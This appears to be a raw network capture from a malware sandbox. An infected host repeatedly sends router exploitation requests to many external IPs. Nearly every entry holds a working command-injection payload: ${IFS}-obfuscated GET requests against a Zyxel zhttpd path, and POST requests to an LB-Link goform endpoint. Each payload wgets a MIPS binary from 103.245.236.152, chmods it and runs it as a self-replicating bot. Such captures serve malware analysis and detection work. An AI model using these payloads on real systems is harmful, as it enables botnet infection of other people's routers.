                                          Jan 14, 2024 15:46:26.225369930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6878192.168.2.234704068.36.182.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225389004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6879192.168.2.2340512131.83.39.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225435972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6880192.168.2.236000638.235.3.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225466967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6881192.168.2.234527268.218.173.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225485086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6882192.168.2.2344382192.174.91.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225519896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6883192.168.2.2359696139.109.106.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225553036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6884192.168.2.2356632145.42.150.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225558043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6885192.168.2.2358808136.203.138.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225611925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6886192.168.2.2356338191.71.140.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225653887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6887192.168.2.2340776180.64.104.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225653887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6888192.168.2.2333652212.197.158.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225682974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6889192.168.2.2340082173.66.80.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225712061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6890192.168.2.235723840.79.223.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225742102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6891192.168.2.235010234.243.217.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225763083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6892192.168.2.234191454.8.64.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225805044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6893192.168.2.235212260.103.163.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225826025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6894192.168.2.236027649.136.178.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225831032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6895192.168.2.2355892153.130.160.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225848913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6896192.168.2.235725059.238.213.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225857973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6897192.168.2.2335196152.114.152.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225878000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6898192.168.2.2347084132.34.98.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225900888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6899192.168.2.2336140221.149.238.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225920916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6900192.168.2.234864445.142.50.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225929976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6901192.168.2.2357218112.203.87.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225975990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6902192.168.2.2336950168.45.82.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.225991011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6903192.168.2.2334920175.175.42.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226057053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6904192.168.2.23441281.176.63.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226068974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6905192.168.2.2357562141.7.117.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226108074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6906192.168.2.234509824.98.30.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226135969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6907192.168.2.234528674.234.143.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226165056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6908192.168.2.2349724202.129.97.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226217031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6909192.168.2.2348410120.181.79.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226244926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6910192.168.2.2357574162.125.82.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226270914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6911192.168.2.2332824187.253.242.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.226294994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6912192.168.2.2353940103.205.164.1918080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:26.657427073 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:27.583429098 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:28.639283895 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:30.942895889 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:35.294277906 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6913192.168.2.2336042202.131.16.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246752977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6914192.168.2.2353354122.253.128.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246803045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6915192.168.2.2342288188.221.26.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246823072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6916192.168.2.2343054169.198.150.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246851921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6917192.168.2.2352972153.135.128.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246865988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6918192.168.2.2334292131.63.187.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246906042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6919192.168.2.2359640106.246.206.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246928930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6920192.168.2.2349498195.208.69.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246984959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6921192.168.2.2358268122.185.33.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.246998072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6922192.168.2.234242420.68.124.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247025967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6923192.168.2.234632079.122.34.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247037888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6924192.168.2.235377632.228.147.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247037888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6925192.168.2.235633071.37.101.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247087002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6926192.168.2.2351046132.146.204.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247108936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6927192.168.2.234498652.12.214.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247132063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6928192.168.2.2344736147.149.231.92443
                                          TimestampBytes transferredDirectionData
